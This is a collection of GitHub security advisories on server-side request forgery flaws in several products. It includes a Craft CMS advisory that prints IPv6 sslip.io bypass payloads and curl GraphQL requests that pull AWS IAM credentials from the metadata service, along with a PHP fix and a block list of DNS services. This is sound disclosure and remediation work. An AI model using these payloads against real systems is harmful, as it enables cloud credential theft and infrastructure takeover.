"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8081"
},
{
"type": "WEB",
"url": "https://github.com/m3ngx1ng/cve/blob/main/CLIProxyAPI-SSRF.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/807811"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/361836"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/361836/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-V2FJ-Q75C-65MR
Vulnerability from github – Published: 2022-08-23 00:00 – Updated: 2025-03-18 21:31wkhtmlTOpdf 0.12.6 is vulnerable to SSRF which allows an attacker to get initial access into the target's system by injecting iframe tag with initial asset IP address on it's source. This allows the attacker to takeover the whole infrastructure by accessing their internal assets.
{
"affected": [],
"aliases": [
"CVE-2022-35583"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-22T16:15:00Z",
"severity": "CRITICAL"
},
"details": "wkhtmlTOpdf 0.12.6 is vulnerable to SSRF which allows an attacker to get initial access into the target\u0027s system by injecting iframe tag with initial asset IP address on it\u0027s source. This allows the attacker to takeover the whole infrastructure by accessing their internal assets.",
"id": "GHSA-v2fj-q75c-65mr",
"modified": "2025-03-18T21:31:41Z",
"published": "2022-08-23T00:00:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35583"
},
{
"type": "WEB",
"url": "https://cyber-guy.gitbook.io/cyber-guys-blog/blogs/initial-access-via-pdf-file-silently"
},
{
"type": "WEB",
"url": "https://drive.google.com/file/d/1LAmf_6CJLk5qDp0an2s_gVQ0TN2wmht5/view?usp=sharing"
},
{
"type": "WEB",
"url": "https://wkhtmltopdf.org"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/171446/wkhtmltopdf-0.12.6-Server-Side-Request-Forgery.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V2GC-RM6G-WRW9
Vulnerability from github – Published: 2026-02-24 15:51 – Updated: 2026-02-24 15:51The SSRF validation in Craft CMS’s GraphQL Asset mutation uses gethostbyname(), which only resolves IPv4 addresses. When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.
This is a bypass of the security fix for CVE-2025-68437 (GHSA-x27p-wfqw-hfcc).
Required Permissions
Exploitation requires GraphQL schema permissions for:
- Edit assets in the <VolumeName> volume
- Create assets in the <VolumeName> volume
These permissions may be granted to: - Authenticated users with appropriate GraphQL schema access - Public Schema (if misconfigured with write permissions)
Technical Details
Root Cause
From PHP documentation: "gethostbyname - Get the IPv4 address corresponding to a given Internet host name"
When no IPv4 (A record) exists, gethostbyname() returns the hostname string unchanged.
Bypass Mechanism
+-----------------------------------------------------------------------------+
| Step 1: Attacker provides URL |
| http://fd00-ec2--254.sslip.io/latest/meta-data/ |
+-----------------------------------------------------------------------------+
| Step 2: Validation calls gethostbyname('fd00-ec2--254.sslip.io') |
| -> No A record exists |
| -> Returns: "fd00-ec2--254.sslip.io" (string, not an IP!) |
+-----------------------------------------------------------------------------+
| Step 3: Blocklist check |
| in_array("fd00-ec2--254.sslip.io", ['169.254.169.254', ...]) |
| -> FALSE (string != IPv4 addresses) |
| -> VALIDATION PASSES |
+-----------------------------------------------------------------------------+
| Step 4: Guzzle makes HTTP request |
| -> Resolves DNS (including AAAA records) |
| -> Gets IPv6: fd00:ec2::254 |
| -> Connects to AWS IMDS IPv6 endpoint |
| -> CREDENTIALS STOLEN |
+-----------------------------------------------------------------------------+
Bypass Payloads
Blocked IPv4 Addresses and Their IPv6 Bypass Equivalents
| Cloud Provider | Blocked IPv4 | IPv6 Equivalent | Bypass Payload |
|---|---|---|---|
| AWS EC2 IMDS | 169.254.169.254 |
fd00:ec2::254 |
http://fd00-ec2--254.sslip.io/ |
| AWS ECS | 169.254.170.2 |
fd00:ec2::254 (via IMDS) |
http://fd00-ec2--254.sslip.io/ |
| Google Cloud GCP | 169.254.169.254 |
fd20:ce::254 |
http://fd20-ce--254.sslip.io/ |
| Azure | 169.254.169.254 |
No IPv6 endpoint | N/A |
| Alibaba Cloud | 100.100.100.200 |
No documented IPv6 | N/A |
| Oracle Cloud | 192.0.0.192 |
No documented IPv6 | N/A |
Additional IPv6 Internal Service Bypass Payloads
| Target | IPv6 Address | Bypass Payload |
|---|---|---|
| IPv6 Loopback | ::1 |
http://0-0-0-0-0-0-0-1.sslip.io/ |
| AWS NTP Service | fd00:ec2::123 |
http://fd00-ec2--123.sslip.io/ |
| AWS DNS Service | fd00:ec2::253 |
http://fd00-ec2--253.sslip.io/ |
| IPv4-mapped IPv6 | ::ffff:169.254.169.254 |
http://0-0-0-0-0-0-ffff-a9fe-a9fe.sslip.io/ |
Steps to Reproduce
Step 1: Verify DNS Resolution
# Verify the hostname has no IPv4 record (what gethostbyname sees)
$ dig fd00-ec2--254.sslip.io A +short
# (empty - no IPv4 record)
# Verify the hostname has IPv6 record (what Guzzle/curl uses)
$ dig fd00-ec2--254.sslip.io AAAA +short
fd00:ec2::254
Step 2: Enumerate AWS IAM Role Name
curl -sk "https://TARGET/index.php?p=admin/actions/graphql/api" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer YOUR_GRAPHQL_TOKEN" \
-d '{
"query": "mutation { save_photos_Asset(_file: { url: \"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\", filename: \"role.txt\" }) { id } }"
}'
Step 3: Retrieve AWS Credentials
# Replace ROLE_NAME with the role discovered in Step 2
curl -sk "https://TARGET/index.php?p=admin/actions/graphql/api" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer YOUR_GRAPHQL_TOKEN" \
-d '{
"query": "mutation { save_photos_Asset(_file: { url: \"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/ROLE_NAME\", filename: \"creds.json\" }) { id } }"
}'
Step 4: Access Saved Credentials
The credentials will be saved to the asset volume (e.g., /userphotos/photos/creds.json).
Attack Scenario
- Attacker finds Craft CMS instance with GraphQL asset mutations enabled
- Attacker sends mutation with
url: "http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/" - Error message or saved file reveals IAM role name
- Attacker retrieves credentials via second mutation
- Attacker uses credentials to access AWS services
- Attacker can now achieve code execution by creating new EC2 instances with their SSH key
Remediation
Replace gethostbyname() with dns_get_record() to check both IPv4 and IPv6:
// Resolve both IPv4 and IPv6 addresses
$records = @dns_get_record($hostname, DNS_A | DNS_AAAA);
if ($records === false) {
$records = [];
}
// Blocked IPv6 metadata prefixes
$blockedIPv6Prefixes = [
'fd00:ec2::', // AWS IMDS, DNS, NTP
'fd20:ce::', // GCP Metadata
'::1', // Loopback
'fe80:', // Link-local
'::ffff:', // IPv4-mapped IPv6
];
foreach ($records as $record) {
// Check IPv4 (existing logic)
if (isset($record['ip']) && in_array($record['ip'], $blockedIPv4)) {
return false;
}
// Check IPv6 (NEW)
if (isset($record['ipv6'])) {
foreach ($blockedIPv6Prefixes as $prefix) {
if (str_starts_with($record['ipv6'], $prefix)) {
return false;
}
}
}
}
Additional Mitigations
| Mitigation | Description |
|---|---|
| Block wildcard DNS services | Block nip.io, sslip.io, xip.io suffixes |
Use dns_get_record() |
Resolves both IPv4 and IPv6 |
Resources
- https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3
- PHP: gethostbyname - "Get the IPv4 address corresponding to a given Internet host name"
- GHSA-x27p-wfqw-hfcc - Original SSRF vulnerability (CVE-2025-68437)
- AWS IMDS IPv6 Documentation
- GCP Metadata Server Documentation
- PayloadsAllTheThings - SSRF Cloud Instances
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.8.22"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.8.23"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.16.18"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "3.5.0"
},
{
"fixed": "4.16.19"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27129"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-24T15:51:07Z",
"nvd_published_at": "2026-02-24T03:16:02Z",
"severity": "MODERATE"
},
"details": "The SSRF validation in Craft CMS\u2019s GraphQL Asset mutation uses `gethostbyname()`, which only resolves IPv4 addresses. When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)).\n\n## Required Permissions\n\nExploitation requires GraphQL schema permissions for:\n- Edit assets in the `\u003cVolumeName\u003e` volume\n- Create assets in the `\u003cVolumeName\u003e` volume\n\nThese permissions may be granted to:\n- Authenticated users with appropriate GraphQL schema access\n- Public Schema (if misconfigured with write permissions)\n\n---\n\n## Technical Details\n\n### Root Cause\n\nFrom PHP documentation: *\"gethostbyname - Get the IPv4 address corresponding to a given Internet host name\"*\n\nWhen no IPv4 (A record) exists, `gethostbyname()` returns the hostname string unchanged.\n\n### Bypass Mechanism\n\n```\n+-----------------------------------------------------------------------------+\n| Step 1: Attacker provides URL |\n| http://fd00-ec2--254.sslip.io/latest/meta-data/ |\n+-----------------------------------------------------------------------------+\n| Step 2: Validation calls gethostbyname(\u0027fd00-ec2--254.sslip.io\u0027) |\n| -\u003e No A record exists |\n| -\u003e Returns: \"fd00-ec2--254.sslip.io\" (string, not an IP!) |\n+-----------------------------------------------------------------------------+\n| Step 3: Blocklist check |\n| in_array(\"fd00-ec2--254.sslip.io\", [\u0027169.254.169.254\u0027, ...]) |\n| -\u003e FALSE (string != IPv4 addresses) |\n| -\u003e VALIDATION PASSES |\n+-----------------------------------------------------------------------------+\n| Step 4: Guzzle makes HTTP request |\n| -\u003e Resolves DNS (including AAAA records) |\n| -\u003e Gets IPv6: fd00:ec2::254 |\n| -\u003e Connects to AWS IMDS IPv6 endpoint |\n| -\u003e CREDENTIALS STOLEN |\n+-----------------------------------------------------------------------------+\n```\n\n---\n\n## Bypass Payloads\n\n### Blocked IPv4 Addresses and Their IPv6 Bypass Equivalents\n\n| Cloud Provider | Blocked IPv4 | IPv6 Equivalent | Bypass Payload |\n|----------------|--------------|-----------------|----------------|\n| **AWS EC2 IMDS** | `169.254.169.254` | `fd00:ec2::254` | `http://fd00-ec2--254.sslip.io/` |\n| **AWS ECS** | `169.254.170.2` | `fd00:ec2::254` (via IMDS) | `http://fd00-ec2--254.sslip.io/` |\n| **Google Cloud GCP** | `169.254.169.254` | `fd20:ce::254` | `http://fd20-ce--254.sslip.io/` |\n| **Azure** | `169.254.169.254` | No IPv6 endpoint | N/A |\n| **Alibaba Cloud** | `100.100.100.200` | No documented IPv6 | N/A |\n| **Oracle Cloud** | `192.0.0.192` | No documented IPv6 | N/A |\n\n### Additional IPv6 Internal Service Bypass Payloads\n\n| Target | IPv6 Address | Bypass Payload |\n|--------|--------------|----------------|\n| **IPv6 Loopback** | `::1` | `http://0-0-0-0-0-0-0-1.sslip.io/` |\n| **AWS NTP Service** | `fd00:ec2::123` | `http://fd00-ec2--123.sslip.io/` |\n| **AWS DNS Service** | `fd00:ec2::253` | `http://fd00-ec2--253.sslip.io/` |\n| **IPv4-mapped IPv6** | `::ffff:169.254.169.254` | `http://0-0-0-0-0-0-ffff-a9fe-a9fe.sslip.io/` |\n\n---\n\n## Steps to Reproduce\n\n### Step 1: Verify DNS Resolution\n\n```bash\n# Verify the hostname has no IPv4 record (what gethostbyname sees)\n$ dig fd00-ec2--254.sslip.io A +short\n# (empty - no IPv4 record)\n\n# Verify the hostname has IPv6 record (what Guzzle/curl uses)\n$ dig fd00-ec2--254.sslip.io AAAA +short\nfd00:ec2::254\n```\n\n### Step 2: Enumerate AWS IAM Role Name\n\n```bash\ncurl -sk \"https://TARGET/index.php?p=admin/actions/graphql/api\" \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer YOUR_GRAPHQL_TOKEN\" \\\n -d \u0027{\n \"query\": \"mutation { save_photos_Asset(_file: { url: \\\"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\\\", filename: \\\"role.txt\\\" }) { id } }\"\n }\u0027\n```\n\n### Step 3: Retrieve AWS Credentials\n\n```bash\n# Replace ROLE_NAME with the role discovered in Step 2\ncurl -sk \"https://TARGET/index.php?p=admin/actions/graphql/api\" \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer YOUR_GRAPHQL_TOKEN\" \\\n -d \u0027{\n \"query\": \"mutation { save_photos_Asset(_file: { url: \\\"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/ROLE_NAME\\\", filename: \\\"creds.json\\\" }) { id } }\"\n }\u0027\n```\n\n### Step 4: Access Saved Credentials\n\nThe credentials will be saved to the asset volume (e.g., `/userphotos/photos/creds.json`).\n\n---\n\n### Attack Scenario\n\n1. Attacker finds Craft CMS instance with GraphQL asset mutations enabled\n2. Attacker sends mutation with `url: \"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\"`\n3. Error message or saved file reveals IAM role name\n4. Attacker retrieves credentials via second mutation\n5. Attacker uses credentials to access AWS services\n6. **Attacker can now achieve code execution by creating new EC2 instances with their SSH key**\n\n---\n\n## Remediation\n\nReplace `gethostbyname()` with `dns_get_record()` to check both IPv4 and IPv6:\n\n```php\n// Resolve both IPv4 and IPv6 addresses\n$records = @dns_get_record($hostname, DNS_A | DNS_AAAA);\nif ($records === false) {\n $records = [];\n}\n\n// Blocked IPv6 metadata prefixes\n$blockedIPv6Prefixes = [\n \u0027fd00:ec2::\u0027, // AWS IMDS, DNS, NTP\n \u0027fd20:ce::\u0027, // GCP Metadata\n \u0027::1\u0027, // Loopback\n \u0027fe80:\u0027, // Link-local\n \u0027::ffff:\u0027, // IPv4-mapped IPv6\n];\n\nforeach ($records as $record) {\n // Check IPv4 (existing logic)\n if (isset($record[\u0027ip\u0027]) \u0026\u0026 in_array($record[\u0027ip\u0027], $blockedIPv4)) {\n return false;\n }\n\n // Check IPv6 (NEW)\n if (isset($record[\u0027ipv6\u0027])) {\n foreach ($blockedIPv6Prefixes as $prefix) {\n if (str_starts_with($record[\u0027ipv6\u0027], $prefix)) {\n return false;\n }\n }\n }\n}\n```\n\n### Additional Mitigations\n\n| Mitigation | Description |\n|------------|-------------|\n| Block wildcard DNS services | Block nip.io, sslip.io, xip.io suffixes |\n| Use `dns_get_record()` | Resolves both IPv4 and IPv6 |\n\n---\n\n## Resources\n\n- https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3\n- [PHP: gethostbyname](https://www.php.net/manual/en/function.gethostbyname.php) - \"Get the **IPv4 address** corresponding to a given Internet host name\"\n- [GHSA-x27p-wfqw-hfcc](https://github.com/advisories/GHSA-x27p-wfqw-hfcc) - Original SSRF vulnerability (CVE-2025-68437)\n- [AWS IMDS IPv6 Documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)\n- [GCP Metadata Server Documentation](https://cloud.google.com/compute/docs/metadata/querying-metadata)\n- [PayloadsAllTheThings - SSRF Cloud Instances](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances.md)",
"id": "GHSA-v2gc-rm6g-wrw9",
"modified": "2026-02-24T15:51:07Z",
"published": "2026-02-24T15:51:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27129"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS: Cloud Metadata SSRF Protection Bypass via IPv6 Resolution"
}
GHSA-V2GF-QRV9-W74G
Vulnerability from github – Published: 2024-07-09 06:30 – Updated: 2024-07-09 06:30SAP CRM (WebClient UI Framework) allows an authenticated attacker to enumerate accessible HTTP endpoints in the internal network by specially crafting HTTP requests. On successful exploitation this can result in information disclosure. It has no impact on integrity and availability of the application.
{
"affected": [],
"aliases": [
"CVE-2024-39598"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-09T04:15:14Z",
"severity": "MODERATE"
},
"details": "SAP CRM (WebClient UI Framework) allows an\nauthenticated attacker to enumerate accessible HTTP endpoints in the internal\nnetwork by specially crafting HTTP requests. On successful exploitation this\ncan result in information disclosure. It has no impact on integrity and\navailability of the application.",
"id": "GHSA-v2gf-qrv9-w74g",
"modified": "2024-07-09T06:30:39Z",
"published": "2024-07-09T06:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39598"
},
{
"type": "WEB",
"url": "https://me.sap.com/notes/3467377"
},
{
"type": "WEB",
"url": "https://url.sap/sapsecuritypatchday"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V2J5-972J-H7CP
Vulnerability from github – Published: 2022-05-17 03:02 – Updated: 2022-05-17 03:02The media-file upload feature in GeniXCMS through 0.0.8 allows remote attackers to conduct SSRF attacks via a URL, as demonstrated by a URL with an intranet IP address.
{
"affected": [],
"aliases": [
"CVE-2017-5518"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-01-17T09:59:00Z",
"severity": "HIGH"
},
"details": "The media-file upload feature in GeniXCMS through 0.0.8 allows remote attackers to conduct SSRF attacks via a URL, as demonstrated by a URL with an intranet IP address.",
"id": "GHSA-v2j5-972j-h7cp",
"modified": "2022-05-17T03:02:38Z",
"published": "2022-05-17T03:02:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5518"
},
{
"type": "WEB",
"url": "https://github.com/semplon/GeniXCMS/issues/64"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/95462"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V2P8-6VVR-34M3
Vulnerability from github – Published: 2025-09-26 09:31 – Updated: 2025-09-26 09:31The Snow Monkey theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 29.1.5 via the request() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
{
"affected": [],
"aliases": [
"CVE-2025-10137"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-26T07:15:40Z",
"severity": "MODERATE"
},
"details": "The Snow Monkey theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 29.1.5 via the request() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
"id": "GHSA-v2p8-6vvr-34m3",
"modified": "2025-09-26T09:31:11Z",
"published": "2025-09-26T09:31:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10137"
},
{
"type": "WEB",
"url": "https://github.com/inc2734/snow-monkey/compare/29.1.5...29.1.6"
},
{
"type": "WEB",
"url": "https://github.com/inc2734/wp-oembed-blog-card"
},
{
"type": "WEB",
"url": "https://github.com/inc2734/wp-oembed-blog-card/blob/master/src/App/Model/Requester.php#L64-L89"
},
{
"type": "WEB",
"url": "https://github.com/inc2734/wp-oembed-blog-card/compare/14.0.1...14.0.2"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4a938a-044b-4991-bc4c-db9e15210f06?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V2PM-MWVH-P9W7
Vulnerability from github – Published: 2026-03-30 18:31 – Updated: 2026-03-30 18:31A flaw has been found in SourceCodester RSS Feed Parser 1.0. Affected by this issue is the function file_get_contents. This manipulation causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been published and may be used.
{
"affected": [],
"aliases": [
"CVE-2026-5126"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-30T18:16:20Z",
"severity": "MODERATE"
},
"details": "A flaw has been found in SourceCodester RSS Feed Parser 1.0. Affected by this issue is the function file_get_contents. This manipulation causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been published and may be used.",
"id": "GHSA-v2pm-mwvh-p9w7",
"modified": "2026-03-30T18:31:18Z",
"published": "2026-03-30T18:31:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5126"
},
{
"type": "WEB",
"url": "https://medium.com/@hemantrajbhati5555/discovering-a-blind-ssrf-vulnerability-in-a-php-rss-feed-parser-243f3ccbdafb"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/780180"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354158"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354158/cti"
},
{
"type": "WEB",
"url": "https://www.sourcecodester.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.